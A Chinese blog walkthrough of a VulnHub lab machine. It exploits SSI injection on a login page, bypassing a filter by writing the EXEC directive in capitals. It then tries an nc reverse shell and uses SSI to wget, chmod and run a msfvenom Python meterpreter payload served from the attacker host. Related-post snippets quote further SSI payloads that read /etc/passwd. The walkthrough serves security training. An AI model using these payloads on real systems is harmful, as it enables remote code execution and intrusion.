SSI注入实战

最新推荐文章于 2024-06-26 17:30:04 发布
最新推荐文章于 2024-06-26 17:30:04 发布
阅读量1.3k 收藏 3
点赞数 1
分类专栏: 靶场实战系列 文章标签: web安全 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_23347209/article/details/125021812
版权

文章目录

靶机环境

靶机下载网站:https://www.vulnhub.com/
使用Vmware虚拟机中NAT网络
靶机 192.168.146.150
攻击机 parrot 192.168.146.129

一、服务器信息搜集

-A 全面扫描(主动扫描)
-p-全端口扫描

nmap -p- -A 192.168.146.150

在这里插入图片描述
👆发现只有开放80端口,并且服务器用的是Ubuntu,中间件为Apache

二、网站信息搜集

1.使用nikto扫描网站目录

nikto 是一款用来发现 web 应用程序漏洞的一个工具,常用于对web网页服务器进行全面的多种扫描

nikto -h http://192.168.146.150

扫描出敏感文件/spukcab/,并且响应为200

在这里插入图片描述
↓访问其url发现两个备份文件
在这里插入图片描述
分别下载到Download里面
在这里插入图片描述
分别查看审计👇,但是并没发现什么有价值的信息哦~
分别是网页源代码和配置信息
在这里插入图片描述
在这里插入图片描述

2.浏览网站

首先是一个登录界面
开burpsuite抓包看一下
代码如下(示例):

sudo burpsuite

并没有发现什么可利用的地方
在这里插入图片描述

三、SSI注入漏洞利用

1、SSI注入简介:

Server Side Injection,即服务器端注入。SSI 是类似于 CGI,用于html动态页面的指令。
若网站目录中发现了stm shtml shtm 的文件后缀名,并且网站对ssi的输入没有进行严格过滤
就有可能允许远程在 Web 应用中注入脚本来执行代码,造成SSI注入攻击。

2、SSI注入测试网站

都输入👇并且点击submit提交

<!--#exec cmd="whoami" -->

在这里插入图片描述
关键敏感字符可能被过滤掉了
在这里插入图片描述
考虑大写翻转进行绕过再提交

<!--#EXEC cmd="whoami" -->

在这里插入图片描述
注入测试成功😄O(∩_∩)O
在这里插入图片描述

四、利用nc反弹shell——失败

ps:本靶机利用nc正向和反向反弹shell经测试后都行不通
parrot建立监听

nc -lvp 4444

<!--#EXEC cmd="nc -e /bin/bash 192.168.146.129 4444" -->

在这里插入图片描述
提交后parrot上没有反应——失败/(ㄒoㄒ)/~~

五、使用msf框架

1、python木马生成

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.146.129 lport=4444 -f raw > shell.py

在这里插入图片描述
在这里插入图片描述

2、建立木马监听端

msfconsole
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set lhost 192.168.146.129
set lpoet 4444
exploit

在这里插入图片描述

3、上传木马文件到本地web服务器上

先把刚刚制作好的python木马移动到var/www/html里

sudo mv /root/shell.py /var/www/html

在这里插入图片描述
**开启apache服务**

service apache2 start

4、构造SSI注入语句执行木马

<!--#EXEC cmd="wget http://192.168.146.129/shell.py"-->

在这里插入图片描述
给传上去的木马文件加权限👇

<!--#EXEC cmd="chmod 777 shell.py"-->

在这里插入图片描述
执行木马

<!--#EXEC cmd="python shell.py"-->

在这里插入图片描述
在这里插入图片描述
成功上线😀,收工啦~~

SSI注入
发哥微课堂
06-28 973
0x00:介绍 SSI 是 Server Side Includes 的缩写,即服务端包含。我们都知道像后台语言 php、asp 等都有文件包含的函数 include,包含一些公共的函数库等。那么 html 也有这种包含的机制,我们可以把它叫做 SSISSI 还有一些使用情况例如,页面需要动态加入一些内容,这些内容常见的比如自己的 ip 地址,自己的位置信息等。SSI 默认的文件类型是 sht...
CTF之Web安全SSI注入
小王的储物间
03-29 444
SSI(server side inject)的出现是为了赋予HTML静态页面动态的效果,通过SSI来执行系统命令;并返回对应的结果。如果再网站目录中发现了.stm;.shtm;.shtml;这样的文件后缀名,并且网站对于SSI的输入没有做到严格过滤或者过滤不充分;很有可能被SSI注入攻击。对于SSI漏洞服务器有很多过滤机制,需要进行绕过,比如大小写。防御措施:一、进行过滤,过滤这些语法中的特殊字符二、关闭服务器SSI相关功能。
SSI漏洞注入
weixin_45007073的博客
01-04 990
在进行SSI漏洞注入之前,先介绍一下什么是SSI漏洞。 SSI 注入全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 准备工作 靶机地址: 链接:https://pan.baidu.com/s/1MTunDny-m5eICXAS9P8ugA 提取码:x3c2 漏洞复现过程 使用netdiscover发现存活主机 netdidscover -i eth0 使用n
ssI注入
qq_44813849的博客
06-12 299
1.利用ifconfig命令扫到攻击机IP:192.168.174.128 然后用命令nmap 192.168.174.128/24扫到靶机IP:192.168.174.133 2.使用nmap -sV 192.168.174.133扫描主机服务信息以及服务版本 使用nmap -T4 -A -v 192.168.174.133快速扫描主机的详细信息 探测敏感信息nikto -host http...
Kali Linux漏洞注入实战指南
2301_77002907的博客
11-07 677
使用-p,我们告诉SQLMap,我们希望在用户名参数中查找sQLi,一旦漏洞被利用,我们希望它检索当前数据库用户名和数据库名称,并知道该用户在数据库中是否具有管理权限。4.一旦SQLMap 检测到应用程序使用的 DBMS,它还会询问我们是否要跳过对其他DBMS 的测试,是否要包含对所检测的特定系统的所有测试,即使它们超出了当前级别和配置风险的范围。可以发现应用给出了id为1的结果。结果显示了id为1的用户信息,这说明前面测试的1'是web应用已经预料到的错误,这里很可能会有sql盲注漏洞,我们来继续猜测。
SSI框架实战:Struts2+Spring+Ibatis简单项目
2. **Spring**:Spring是一个全面的后端应用框架,它支持依赖注入(DI)和面向切面编程(AOP)。在本项目中,Spring可能被用来管理Bean的生命周期和事务,同时提供服务层和数据访问层的抽象。Spring的IoC容器负责...
SSI框架整合实战成果(zip)
01-16
**SSI框架整合实战成果(zip)** 本压缩包包含的是一份关于SSI框架(Struts2、Spring、Ibatis)整合的实战项目成果。这三大框架是Java Web开发中常用的技术栈,它们各自承担着不同的职责,共同构建了一个高效、灵活的...
ssi项目实战:struts2 ibatis spring的综合应用
### SSI项目实例 #### 知识点一:Struts2框架 Struts2是一个基于MVC设计模式的Web应用框架,它将Web层的应用程序分成了三个核心组件:Model(模型)、View(视图)和Controller(控制器)。在Struts2中,Action类...
SSI项目实战:实现产品自动补全功能教程
Spring的核心特性是支持依赖注入(DI)和面向切面编程(AOP),能有效地帮助开发者实现松耦合和代码的可重用性。Spring框架包含了一系列的功能模块,如Spring MVC用于构建Web应用程序,Spring Data用于简化数据访问...
网络安全[脚本小子] -- SSI注入
Skycrab
10-01 7403
本系列文章将与大家一起学习探讨网络安全知识,但我们不做脚本小子。 在计算机和网络领域里,脚本小子(script kiddie)是一个贬义词用来描述以黑客自居并沾沾自喜的初学者。 他们钦慕于黑客的能力与探索精神,但与黑客所不同的是,脚本小子通常只是对计算机系统有基础了解与爱好, 但并不注重程序语言、算法、和数据结构的研究,虽然这些对于真正伟大的黑客来说是必须具备的素质。 他们常常从某些网站上复制脚本
SSI 注入漏洞
最新发布
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
06-26 682
通过信息收集技术,了解我们的检测目标运行哪些类型的 Web 服务器,查看检测网站的内容来猜测是否支持 SSI,由于 .shtml 文件后缀名是用来表明网页文件是否包含 SSI 指令的,因此如果该网站使用了 .shtml 文件,那说明该网站支持 SSI 指令。在很多场景中,用户输入的内容可以显示在页面中,比如一个存在反射 XSS 漏洞的页面,如果输入的 payload 不是 XSS 代码而是 SSI 标签,服务器又开启了 SSI 支持的话就会存在 SSI 漏洞。SSI 具有强大的功能,只要使用一条简单的。
SSI注入漏洞
Hydra的博客
11-19 9715
SSI 注入全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 从技术角度上来说,SSI就是...
CTF-SSI注入攻击
Reaches_r的博客
08-06 578
前言:SSI介绍 SSl(server side inject)的出现是为了赋予html静态页面动态的效果,通过ssi来执行系统命令,并返回对应的结果。 如果在网站目录中发现了.stm, .shtm .shtml,并且网站对于ssi的输入没有做到严格过滤,很有可能被ssl注入攻击。 1.用dirb和nikto扫描,收集有用信息。很明显可以判断有ssi漏洞 2.看看这个index文件,是一个命令行,这时开始寻找注入点 3.发现首页有个可以输入的地方,feedback(反馈)肯定是个注入点..
ssi注入
qq_44832048的博客
06-13 563
ssi注入就是寻找一个输入点输入类似<!--#exec cmd="命令" --> 格式,看看能不能运行系统命令。 如<!--#exec cmd="ls" --><!--#exec cmd="cat /etc/passwd" --> 切换目录<!--#exec cmd="cd /root/dir/" --> 像正常一样先ifco...
CTF-SSI注入
su__xiaoyan的博客
12-25 374
SSI注入 SSI 注入全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于CGI,用于执行动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意代码
代码审计后的SSI注入漏洞
qq_53142368的博客
11-19 3167
[BJDCTF2020]EasySearch 首先就是dirsearch扫描,用dirsearch的前提一定是前端看不到啥东西了,呢就不用猜,绝对有一些隐藏文件。 然后dirsearch就扫描出来了index;php.swp文件。。。 然后就看到了源码 进行代码审计 [<?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值